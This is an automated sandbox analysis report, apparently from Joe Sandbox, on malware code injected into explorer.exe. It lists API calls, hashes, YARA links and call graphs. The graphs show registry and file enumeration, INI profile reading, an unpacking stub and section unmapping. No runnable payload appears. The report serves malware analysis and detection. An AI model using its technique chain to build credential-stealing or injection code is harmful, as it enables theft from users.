                                                                                                                                        • Opcode ID: d2f259fb0b54e555bd9ecc7c4a3bba17534b532d1afde1a19d9e9df1827263b0
                                                                                                                                        • Instruction ID: f6ffbb5bd83acad33de10629dc22719fcb8ff5e71e207ae918a3e9640371092b
                                                                                                                                        • Opcode Fuzzy Hash: d2f259fb0b54e555bd9ecc7c4a3bba17534b532d1afde1a19d9e9df1827263b0
                                                                                                                                        • Instruction Fuzzy Hash: 34D125707483049FEB15EF24C984B2FBBEAABC8754F50891EF9458B290DB74D941CB92
                                                                                                                                        Function 027596BC Relevance: 6.4, APIs: 5, Instructions: 105COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • _alldiv.NTDLL(000000FF,7FFFFFFF,?,?), ref: 027596E7
                                                                                                                                        • _alldiv.NTDLL(00000000,80000000,?,?), ref: 02759707
                                                                                                                                        • _alldiv.NTDLL(00000000,80000000,?,?), ref: 02759739
                                                                                                                                        • _alldiv.NTDLL(00000001,80000000,?,?), ref: 0275976C
                                                                                                                                        • _allmul.NTDLL(?,?,?,?), ref: 02759798
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000D.00000002.2747671125.0000000002751000.00000040.80000000.00040000.00000000.sdmp, Offset: 02751000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_13_2_2751000_explorer.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _alldiv$_allmul
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 4215241517-0
                                                                                                                                        • Opcode ID: aea503a78b0f5229cb44f0642643f5c49b5350688a0b94e79065ce13f3554f20
                                                                                                                                        • Instruction ID: 744227941fe3d03fb948cd0b403ceeeaa19aea3004c4076d06764692925a29fb
                                                                                                                                        • Opcode Fuzzy Hash: aea503a78b0f5229cb44f0642643f5c49b5350688a0b94e79065ce13f3554f20
                                                                                                                                        • Instruction Fuzzy Hash: A62104315043B7EAD7355D254CC4B6BF5D9CBD07A8F241D2FEF0192240FAD2840585E1
                                                                                                                                        Function 0276B162 Relevance: 6.1, APIs: 4, Instructions: 137COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • _allmul.NTDLL(?,00000000,00000000), ref: 0276B1B3
                                                                                                                                        • _alldvrm.NTDLL(?,?,00000000), ref: 0276B20F
                                                                                                                                        • _allrem.NTDLL(?,00000000,?,?), ref: 0276B28A
                                                                                                                                        • memcpy.NTDLL(?,?,00000000,?,00000000,?,?,?,00000000,?,?,00000000,00000000), ref: 0276B298
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000D.00000002.2747671125.0000000002751000.00000040.80000000.00040000.00000000.sdmp, Offset: 02751000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_13_2_2751000_explorer.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _alldvrm_allmul_allremmemcpy
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1484705121-0
                                                                                                                                        • Opcode ID: c07b1973dc15deb075946aadc925f946f6ec129b35c749f45d640880d61a26fe
                                                                                                                                        • Instruction ID: d39c3ea06e40642088fb777610ae4d37e7f2b491e16e07baa0b9cad5649f2ad4
                                                                                                                                        • Opcode Fuzzy Hash: c07b1973dc15deb075946aadc925f946f6ec129b35c749f45d640880d61a26fe
                                                                                                                                        • Instruction Fuzzy Hash: 1A4126756083019FC719EF25C898A2BBBE6BFC9304F44992DF98597251DB31E805CF52
                                                                                                                                        Function 02751895 Relevance: 6.0, APIs: 4, Instructions: 46COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • GetHGlobalFromStream.COMBASE(?,?), ref: 027518A7
                                                                                                                                        • GlobalLock.KERNEL32(02754B57), ref: 027518B6
                                                                                                                                        • GlobalUnlock.KERNEL32(?), ref: 027518F4
                                                                                                                                          • Part of subcall function 02751000: GetProcessHeap.KERNEL32(00000008,?,027511C7,?,?,00000001,00000000,?), ref: 02751003
                                                                                                                                          • Part of subcall function 02751000: RtlAllocateHeap.NTDLL(00000000), ref: 0275100A
                                                                                                                                        • RtlMoveMemory.NTDLL(00000000,00000000,?), ref: 027518E8
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000D.00000002.2747671125.0000000002751000.00000040.80000000.00040000.00000000.sdmp, Offset: 02751000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_13_2_2751000_explorer.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Global$Heap$AllocateFromLockMemoryMoveProcessStreamUnlock
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1688112647-0
                                                                                                                                        • Opcode ID: 3ce90fa5a5d9d62fdf1194e344bd3d2a190b9a94c09e909d6df8ca9ab778bced
                                                                                                                                        • Instruction ID: 373b6dfd2afcf9cda382768ac9a3a2bb5c1a84a9c48d04d9a1a6c143f3d557b8
                                                                                                                                        • Opcode Fuzzy Hash: 3ce90fa5a5d9d62fdf1194e344bd3d2a190b9a94c09e909d6df8ca9ab778bced
                                                                                                                                        • Instruction Fuzzy Hash: 7201A235640316AF8B115F29D80895FBBEEEFC4262B44C82EF80983250DF71D8149A20
                                                                                                                                        Function 02751953 Relevance: 6.0, APIs: 4, Instructions: 37stringCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • lstrlenW.KERNEL32(?,00000000,00000000,?,?,02752F0C), ref: 02751973
                                                                                                                                        • lstrlenW.KERNEL32(027A6564,?,?,02752F0C), ref: 02751978
                                                                                                                                        • lstrcatW.KERNEL32(00000000,?,?,?,02752F0C), ref: 02751990
                                                                                                                                        • lstrcatW.KERNEL32(00000000,027A6564,?,?,02752F0C), ref: 02751994
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000D.00000002.2747671125.0000000002751000.00000040.80000000.00040000.00000000.sdmp, Offset: 02751000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_13_2_2751000_explorer.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: lstrcatlstrlen
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1475610065-0
                                                                                                                                        • Opcode ID: 776665f6d7f7c59b0a0c94aab805562f03773db0fe395a2d13f5bae8ac98165a
                                                                                                                                        • Instruction ID: fe45db40afd5a66eb428e53f96e215c5a9a6108fbfedac241642ef5ada56b034
                                                                                                                                        • Opcode Fuzzy Hash: 776665f6d7f7c59b0a0c94aab805562f03773db0fe395a2d13f5bae8ac98165a
                                                                                                                                        • Instruction Fuzzy Hash: CEE0656270026C1B4A1476AE5C94E7BB79DCAC95A634A4039FE08D3201FAA69C0546B0
                                                                                                                                        Function 0277F21C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 78COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 02756A81: memset.NTDLL ref: 02756A9C
                                                                                                                                        • _aulldiv.NTDLL(?,00000000,?,00000000), ref: 0277F2A1
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000D.00000002.2747671125.0000000002751000.00000040.80000000.00040000.00000000.sdmp, Offset: 02751000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_13_2_2751000_explorer.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _aulldivmemset
                                                                                                                                        • String ID: %llu$%llu
                                                                                                                                        • API String ID: 714058258-4283164361
                                                                                                                                        • Opcode ID: e59ff1284b3358d9b1479c526be939fb8d4fd64b92b66b7e028f840c497f29a4
                                                                                                                                        • Instruction ID: 9324496af7b2cae70f11663186fcb06c107c0f88e7b82d1786a419788d09539f
                                                                                                                                        • Opcode Fuzzy Hash: e59ff1284b3358d9b1479c526be939fb8d4fd64b92b66b7e028f840c497f29a4
                                                                                                                                        • Instruction Fuzzy Hash: 2B21F6B26442156BDB15AA24CC49F6FB75AEF81730F044728FD22976C0DB61DC11CBE2
                                                                                                                                        Function 0276203C Relevance: 5.3, APIs: 4, Instructions: 274COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • _allmul.NTDLL(?,00000000,?), ref: 02762174
                                                                                                                                        • _allmul.NTDLL(?,?,?,00000000), ref: 0276220E
                                                                                                                                        • _allmul.NTDLL(?,00000000,00000000,?), ref: 02762241
                                                                                                                                        • _allmul.NTDLL(02752E26,00000000,?,?), ref: 02762295
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000D.00000002.2747671125.0000000002751000.00000040.80000000.00040000.00000000.sdmp, Offset: 02751000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_13_2_2751000_explorer.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _allmul
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 4029198491-0
                                                                                                                                        • Opcode ID: 3085842643abf35a20991388616d187f76d7e9293e8280a6adbe6ee58f7c727c
                                                                                                                                        • Instruction ID: e5aa234eaff8a619a7bc37006636063fd540485d85ff0dd725adfc53d8ee4c9a
                                                                                                                                        • Opcode Fuzzy Hash: 3085842643abf35a20991388616d187f76d7e9293e8280a6adbe6ee58f7c727c
                                                                                                                                        • Instruction Fuzzy Hash: 9DA166B07087019FC755EE65C898A3FB7E6AF88704F40482DFE969B251EB70EC458B42
                                                                                                                                        Function 027678B9 Relevance: 5.2, APIs: 4, Instructions: 227COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000D.00000002.2747671125.0000000002751000.00000040.80000000.00040000.00000000.sdmp, Offset: 02751000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_13_2_2751000_explorer.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: memcpymemset
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1297977491-0
                                                                                                                                        • Opcode ID: af376ec41a70e04bbcf17ff503d3a460e6231a99f720da1180408ef0166df4d8
                                                                                                                                        • Instruction ID: f0a079330af919b1f621804a9088fcf556fcda079054871b426098dd4f079aa1
                                                                                                                                        • Opcode Fuzzy Hash: af376ec41a70e04bbcf17ff503d3a460e6231a99f720da1180408ef0166df4d8
                                                                                                                                        • Instruction Fuzzy Hash: D4819D716083159FC355DF28C888A3BFBE6EF88758F44496DF88A97251E770E904CB91
                                                                                                                                        Function 0275190B Relevance: 5.0, APIs: 4, Instructions: 36stringCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • lstrlen.KERNEL32(?,?,?,?,00000000,02752783), ref: 0275192B
                                                                                                                                        • lstrlen.KERNEL32(00000000,?,?,?,00000000,02752783), ref: 02751930
                                                                                                                                        • lstrcat.KERNEL32(00000000,?), ref: 02751946
                                                                                                                                        • lstrcat.KERNEL32(00000000,00000000), ref: 0275194A
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000D.00000002.2747671125.0000000002751000.00000040.80000000.00040000.00000000.sdmp, Offset: 02751000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_13_2_2751000_explorer.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: lstrcatlstrlen
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1475610065-0
                                                                                                                                        • Opcode ID: 3b19169f51a2f1e51afd1bf1f69bcbd74e54489e32a7d4308cac141e0809bd3a
                                                                                                                                        • Instruction ID: ede1772f415710df6029033855fa27bd64405c075e9bf9ef6cd6eab4e6b0b2c8
                                                                                                                                        • Opcode Fuzzy Hash: 3b19169f51a2f1e51afd1bf1f69bcbd74e54489e32a7d4308cac141e0809bd3a
                                                                                                                                        • Instruction Fuzzy Hash: B6E09B9270026C1B4A2176AE5C84F7BB7DDCAC55B634A0175FD08D3201EF969C014AF0

                                                                                                                                        Execution Graph

                                                                                                                                        Execution Coverage:21.6%
                                                                                                                                        Dynamic/Decrypted Code Coverage:87.3%
                                                                                                                                        Signature Coverage:0%
                                                                                                                                        Total number of Nodes:181
                                                                                                                                        Total number of Limit Nodes:17
                                                                                                                                        execution_graph 1128 cda1af 1130 cda1bd 1128->1130 1129 cda1cf 1130->1129 1132 cda298 1130->1132 1133 cda29d 1132->1133 1134 cda385 LoadLibraryA 1133->1134 1136 cda3e0 VirtualProtect VirtualProtect 1133->1136 1138 cda3d5 1133->1138 1134->1133 1137 cda46e 1136->1137 1138->1129 1148 cda1f9 1149 cda228 1148->1149 1151 cda248 1148->1151 1150 cda298 3 API calls 1149->1150 1150->1151 941 cda298 942 cda29d 941->942 943 cda385 LoadLibraryA 942->943 945 cda3e0 VirtualProtect VirtualProtect 942->945 947 cda3d5 942->947 943->942 946 cda46e 945->946 996 cd3608 1001 cd3458 StrStrIW 996->1001 999 cd3458 17 API calls 1000 cd365d 999->1000 1002 cd348f 1001->1002 1014 cd350f 1001->1014 1026 cd2774 1002->1026 1004 cd3523 RegOpenKeyExW 1005 cd35e4 1004->1005 1016 cd354d 1004->1016 1006 cd1860 RtlFreeHeap 1005->1006 1008 cd35f7 1006->1008 1007 cd35b5 RegEnumKeyExW 1007->1005 1007->1016 1008->999 1009 cd3507 1011 cd1860 RtlFreeHeap 1009->1011 1010 cd34a8 1010->1009 1010->1014 1039 cd28a0 1010->1039 1011->1014 1013 cd2700 RtlFreeHeap 1013->1016 1014->1004 1016->1007 1016->1013 1018 cd3458 14 API calls 1016->1018 1022 cd1860 RtlFreeHeap 1016->1022 1017 cd34fa 1019 cd1860 RtlFreeHeap 1017->1019 1018->1016 1019->1009 1022->1016 1025 cd1860 RtlFreeHeap 1025->1017 1027 cd2797 RegOpenKeyExW 1026->1027 1028 cd2793 1026->1028 1029 cd286b 1027->1029 1030 cd27d5 RegQueryValueExW 1027->1030 1028->1027 1031 cd288d 1029->1031 1033 cd2774 RtlFreeHeap 1029->1033 1032 cd285b RegCloseKey 1030->1032 1034 cd27fe 1030->1034 1031->1010 1032->1029 1032->1031 1033->1031 1034->1032 1035 cd281a RegQueryValueExW 1034->1035 1036 cd2844 1035->1036 1037 cd2851 1035->1037 1036->1032 1038 cd1860 RtlFreeHeap 1037->1038 1038->1036 1040 cd28b9 1039->1040 1041 cd2922 1040->1041 1042 cd1860 RtlFreeHeap 1040->1042 1041->1017 1045 cd2700 1041->1045 1043 cd28df 1042->1043 1043->1041 1044 cd2774 5 API calls 1043->1044 1044->1043 1046 cd2712 1045->1046 1047 cd1860 RtlFreeHeap 1046->1047 1048 cd271d 1047->1048 1048->1017 1049 cd3254 1048->1049 1073 cd298c 1049->1073 1052 cd343a 1052->1025 1053 cd298c GetFileAttributesW 1055 cd3295 1053->1055 1054 cd342c 1082 cd30a8 1054->1082 1055->1052 1055->1054 1077 cd2938 1055->1077 1059 cd340c 1061 cd1860 RtlFreeHeap 1059->1061 1060 cd3304 GetPrivateProfileSectionNamesW 1060->1059 1071 cd331e 1060->1071 1062 cd3414 1061->1062 1063 cd1860 RtlFreeHeap 1062->1063 1064 cd341c 1063->1064 1065 cd1860 RtlFreeHeap 1064->1065 1067 cd3424 1065->1067 1066 cd334e GetPrivateProfileStringW 1068 cd3379 GetPrivateProfileIntW 1066->1068 1066->1071 1069 cd1860 RtlFreeHeap 1067->1069 1068->1071 1069->1054 1070 cd30a8 RtlFreeHeap FindFirstFileW FindNextFileW FindClose 1070->1071 1071->1059 1071->1066 1071->1070 1072 cd1860 RtlFreeHeap 1071->1072 1072->1071 1074 cd2999 1073->1074 1076 cd29a9 1073->1076 1075 cd299e GetFileAttributesW 1074->1075 1074->1076 1075->1076 1076->1052 1076->1053 1078 cd2945 1077->1078 1079 cd2980 1077->1079 1078->1079 1080 cd294a CreateFileW 1078->1080 1079->1059 1079->1060 1080->1079 1081 cd2972 CloseHandle 1080->1081 1081->1079 1083 cd30cc 1082->1083 1084 cd30f1 FindFirstFileW 1083->1084 1085 cd3237 1084->1085 1095 cd3117 1084->1095 1086 cd1860 RtlFreeHeap 1085->1086 1087 cd323f 1086->1087 1088 cd1860 RtlFreeHeap 1087->1088 1089 cd3247 1088->1089 1089->1052 1090 cd3210 FindNextFileW 1091 cd3226 FindClose 1090->1091 1090->1095 1091->1085 1092 cd1860 RtlFreeHeap 1092->1090 1094 cd2700 RtlFreeHeap 1094->1095 1095->1090 1095->1092 1095->1094 1096 cd30a8 RtlFreeHeap 1095->1096 1097 cd1860 RtlFreeHeap 1095->1097 1098 cd2f7c 1095->1098 1096->1095 1097->1095 1108 cd2bc0 1098->1108 1102 cd3086 1102->1095 1103 cd307e 1104 cd1860 RtlFreeHeap 1103->1104 1104->1102 1105 cd2e04 RtlFreeHeap 1106 cd2fb6 1105->1106 1106->1102 1106->1103 1106->1105 1107 cd1860 RtlFreeHeap 1106->1107 1107->1106 1109 cd2bf3 1108->1109 1110 cd2700 RtlFreeHeap 1109->1110 1111 cd2c54 1110->1111 1112 cd2a54 RtlFreeHeap 1111->1112 1113 cd2c68 1112->1113 1114 cd2c7e 1113->1114 1115 cd1860 RtlFreeHeap 1113->1115 1116 cd1860 RtlFreeHeap 1114->1116 1115->1114 1122 cd2cb2 1116->1122 1117 cd2da3 1118 cd1860 RtlFreeHeap 1117->1118 1119 cd2dd9 1118->1119 1120 cd1860 RtlFreeHeap 1119->1120 1121 cd2de1 1120->1121 1121->1102 1124 cd2a54 1121->1124 1122->1117 1123 cd1860 RtlFreeHeap 1122->1123 1123->1117 1126 cd2a86 1124->1126 1125 cd2ad9 1125->1106 1126->1125 1127 cd1860 RtlFreeHeap 1126->1127 1127->1125 1139 cd3668 1140 cd3458 17 API calls 1139->1140 1141 cd369b 1140->1141 1142 cd3458 17 API calls 1141->1142 1143 cd36bd 1142->1143 948 cd37f4 949 cd3804 948->949 956 cd372c 949->956 952 cd387c 954 cd3817 954->952 966 cd36c8 954->966 957 cd375a 956->957 958 cd3777 RegCreateKeyExW 957->958 959 cd37bc RegCloseKey 958->959 960 cd37cd 958->960 959->960 974 cd1860 960->974 963 cd22b4 964 cd22c8 CreateStreamOnHGlobal 963->964 965 cd22d6 963->965 964->965 965->954 967 cd371e 966->967 968 cd36cd 966->968 967->952 969 cd3716 968->969 978 cd21e4 968->978 971 cd1860 RtlFreeHeap 969->971 971->967 972 cd3706 973 cd1860 RtlFreeHeap 972->973 973->969 975 cd186e 974->975 976 cd1886 975->976 977 cd1878 RtlFreeHeap 975->977 976->952 976->963 977->976 979 cd220b 978->979 984 cd1e20 979->984 982 cd1860 RtlFreeHeap 983 cd2297 982->983 983->972 990 cd1e6d 984->990 985 cd21b5 986 cd1860 RtlFreeHeap 985->986 987 cd21cb 986->987 987->982 988 cd219b 988->985 989 cd1860 RtlFreeHeap 988->989 989->985 990->985 990->988 994 cd1860 RtlFreeHeap 990->994 995 cd2177 990->995 991 cd1860 RtlFreeHeap 992 cd218e 991->992 992->988 993 cd1860 RtlFreeHeap 992->993 993->988 994->995 995->991 1144 cda1e0 1145 cda1e6 1144->1145 1146 cda298 3 API calls 1145->1146 1147 cda248 1146->1147

                                                                                                                                        Callgraph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        • Opacity -> Relevance
                                                                                                                                        • Disassembly available
                                                                                                                                        callgraph 0 Function_00CD234C 1 Function_00CD1A4C 2 Function_00CD4048 3 Function_00CD36C8 22 Function_00CD18E8 3->22 25 Function_00CD21E4 3->25 27 Function_00CD1860 3->27 61 Function_00CD1B14 3->61 4 Function_00CD1C40 5 Function_00CD2340 6 Function_00CD29C0 48 Function_00CD2688 6->48 7 Function_00CD2BC0 18 Function_00CD2A54 7->18 7->27 7->48 55 Function_00CD2700 7->55 66 Function_00CD2610 7->66 72 Function_00CD272C 7->72 83 Function_00CD1838 7->83 84 Function_00CD1938 7->84 8 Function_00CD9FC2 9 Function_00CD3458 9->6 9->9 13 Function_00CD3254 9->13 9->27 37 Function_00CD2774 9->37 9->48 9->55 78 Function_00CD28A0 9->78 9->83 10 Function_00CD9ADA 11 Function_00CDA25A 12 Function_00CDA055 13->27 43 Function_00CD298C 13->43 13->48 13->72 75 Function_00CD30A8 13->75 82 Function_00CD2938 13->82 13->83 14 Function_00CD2354 15 Function_00CD1AD4 16 Function_00CD14D4 17 Function_00CD1254 18->27 18->83 19 Function_00CD18D0 20 Function_00CD156C 21 Function_00CD2B6C 60 Function_00CD2498 21->60 62 Function_00CD2514 21->62 23 Function_00CD22E8 24 Function_00CD3668 24->9 25->27 80 Function_00CD1E20 25->80 25->83 26 Function_00CDA1E0 59 Function_00CDA298 26->59 27->15 28 Function_00CD1DE0 28->1 29 Function_00CD1560 30 Function_00CD2360 31 Function_00CD2F7C 31->7 31->18 31->27 36 Function_00CD2EF8 31->36 51 Function_00CD2E04 31->51 32 Function_00CDA1F9 32->59 33 Function_00CD14F9 34 Function_00CD18F8 35 Function_00CD2AF8 35->83 36->66 37->27 37->37 37->83 38 Function_00CD37F4 38->3 38->14 38->21 38->23 41 Function_00CD2570 38->41 47 Function_00CD2308 38->47 69 Function_00CD372C 38->69 70 Function_00CD22AC 38->70 86 Function_00CD22B4 38->86 39 Function_00CD1576 40 Function_00CD23F0 71 Function_00CD23AC 40->71 41->14 79 Function_00CD23A0 41->79 41->83 42 Function_00CDB00C 44 Function_00CD1B8C 44->83 45 Function_00CD188C 45->83 46 Function_00CD1508 48->83 49 Function_00CD3608 49->9 50 Function_00CD1405 51->27 51->44 51->83 52 Function_00CDB181 53 Function_00CD1980 54 Function_00CD1000 55->27 55->48 56 Function_00CD4082 57 Function_00CD141D 58 Function_00CD971C 59->11 60->5 60->71 61->83 62->0 62->14 62->30 62->40 62->79 63 Function_00CDB111 64 Function_00CD1D10 64->34 64->83 65 Function_00CD2410 65->40 65->71 66->83 67 Function_00CD9912 68 Function_00CD9C92 69->27 69->83 73 Function_00CDA1AF 73->59 74 Function_00CD41A9 75->27 75->31 75->35 75->48 75->55 75->72 75->75 76 Function_00CD99A7 77 Function_00CD47A7 78->27 78->37 78->83 80->4 80->19 80->27 80->28 80->34 80->45 80->53 80->64 80->83 81 Function_00CD1822 85 Function_00CD9EB4 87 Function_00CD9930 88 Function_00CD38B0 88->15 88->83 88->88 89 Function_00CD14B2

                                                                                                                                        Executed Functions

                                                                                                                                        Function 00CD30A8 Relevance: 4.7, APIs: 3, Instructions: 153fileCOMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 184 cd30a8-cd30e3 call cd2688 call cd272c 189 cd30ec-cd3111 call cd2688 FindFirstFileW 184->189 190 cd30e5-cd30e6 184->190 193 cd3237-cd3252 call cd1860 * 2 189->193 194 cd3117-cd3118 189->194 190->189 196 cd311f-cd3124 194->196 198 cd31ad-cd31df call cd2688 call cd2700 196->198 199 cd312a-cd313e 196->199 214 cd3208-cd320b call cd1860 198->214 215 cd31e1-cd31eb call cd2af8 198->215 205 cd3144-cd3158 199->205 206 cd3210-cd3220 FindNextFileW 199->206 205->206 211 cd315e-cd316b call cd272c 205->211 206->196 208 cd3226-cd3230 FindClose 206->208 208->193 219 cd316d-cd3174 211->219 220 cd3176 211->220 214->206 215->214 223 cd31ed-cd3203 call cd2f7c 215->223 222 cd3178-cd31a8 call cd2688 call cd2700 call cd30a8 call cd1860 219->222 220->222 222->198 223->214
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000F.00000002.2707640734.0000000000CD1000.00000040.80000000.00040000.00000000.sdmp, Offset: 00CD1000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_15_2_cd1000_explorer.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Find$File$CloseFirstNext
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3541575487-0
                                                                                                                                        • Opcode ID: 1d486c4d822fa2842588a2a5b257e154b5955fe3e65b36dc891d1a63625ddf83
                                                                                                                                        • Instruction ID: efecc55afcb6a33f0b603e3616053bf80af56c2ce56028a8ace048c0c6e4c7a4
                                                                                                                                        • Opcode Fuzzy Hash: 1d486c4d822fa2842588a2a5b257e154b5955fe3e65b36dc891d1a63625ddf83
                                                                                                                                        • Instruction Fuzzy Hash: A2419430718B4D5FDB54FB3888487AE73E2FBD8340F444A2AA55AC3391EE74DA049782
                                                                                                                                        Function 00CD38B0 Relevance: 1.5, APIs: 1, Instructions: 40nativeCOMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 239 cd38b0-cd3907 call cd1ad4 call cd1838 NtUnmapViewOfSection call cd388c 248 cd3909-cd390c call cd38b0 239->248 249 cd3911-cd391a 239->249 248->249
                                                                                                                                        APIs
                                                                                                                                        • NtUnmapViewOfSection.NTDLL ref: 00CD38F2
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000F.00000002.2707640734.0000000000CD1000.00000040.80000000.00040000.00000000.sdmp, Offset: 00CD1000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_15_2_cd1000_explorer.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: SectionUnmapView
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 498011366-0
                                                                                                                                        • Opcode ID: 3effbf976d711b6f0a270e8bac9098164ff64bae19101d68ee38af86237bc783
                                                                                                                                        • Instruction ID: 0cebeac83c0bf4d2032fe3c223357df7a9e1e2b6399a428aa3656d8bebeff8cf
                                                                                                                                        • Opcode Fuzzy Hash: 3effbf976d711b6f0a270e8bac9098164ff64bae19101d68ee38af86237bc783
                                                                                                                                        • Instruction Fuzzy Hash: DAF0A020F11A481BEA6C77BD685D3382280EB98310F50052BBA29C33D2DC398A45A302
                                                                                                                                        Function 00CD2774 Relevance: 6.1, APIs: 4, Instructions: 124registryCOMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        APIs
                                                                                                                                        • RegOpenKeyExW.KERNELBASE ref: 00CD27C7
                                                                                                                                        • RegQueryValueExW.KERNELBASE ref: 00CD27F4
                                                                                                                                        • RegQueryValueExW.KERNELBASE ref: 00CD283A
                                                                                                                                        • RegCloseKey.KERNELBASE ref: 00CD2860
                                                                                                                                          • Part of subcall function 00CD1860: RtlFreeHeap.NTDLL ref: 00CD1880
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000F.00000002.2707640734.0000000000CD1000.00000040.80000000.00040000.00000000.sdmp, Offset: 00CD1000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_15_2_cd1000_explorer.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: QueryValue$CloseFreeHeapOpen
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1641618270-0
                                                                                                                                        • Opcode ID: 9230968f98c31981e9a295993d042543a9bd8a1a5e48c502c57164f1c8228ab1
                                                                                                                                        • Instruction ID: 8c199e66a84977d9b1a4cbb2a0d23a4e6a98e6cfe5ef8ad20f60a6bbc89fa2dd
                                                                                                                                        • Opcode Fuzzy Hash: 9230968f98c31981e9a295993d042543a9bd8a1a5e48c502c57164f1c8228ab1
                                                                                                                                        • Instruction Fuzzy Hash: 1531B431208B488FE768DB28D84877AB7D0FBB8355F04062FE59AC33A4DF24C9419742
                                                                                                                                        Function 00CD372C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 71registryCOMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 22 cd372c-cd37ba call cd1838 RegCreateKeyExW 26 cd37bc-cd37cb RegCloseKey 22->26 27 cd37d6-cd37f0 call cd1860 22->27 26->27 28 cd37cd-cd37d3 26->28 28->27
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000F.00000002.2707640734.0000000000CD1000.00000040.80000000.00040000.00000000.sdmp, Offset: 00CD1000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_15_2_cd1000_explorer.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CloseCreate
                                                                                                                                        • String ID: ?
                                                                                                                                        • API String ID: 2932200918-1684325040
                                                                                                                                        • Opcode ID: 857738d7a85a5e3c817c71693e64eb2082b10df52a007d4c7754adbbf86b2b9f
                                                                                                                                        • Instruction ID: 060fe8ae8641a56d3f64adb11b76773638a4de592244b6899c1b319aa9125b8e
                                                                                                                                        • Opcode Fuzzy Hash: 857738d7a85a5e3c817c71693e64eb2082b10df52a007d4c7754adbbf86b2b9f
                                                                                                                                        • Instruction Fuzzy Hash: D1119070608B488FD751DF69D48866AB7E1FB98305F40062FE58AC3360DF389985CB82
                                                                                                                                        Function 00CDA298 Relevance: 4.8, APIs: 3, Instructions: 252memorylibraryCOMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
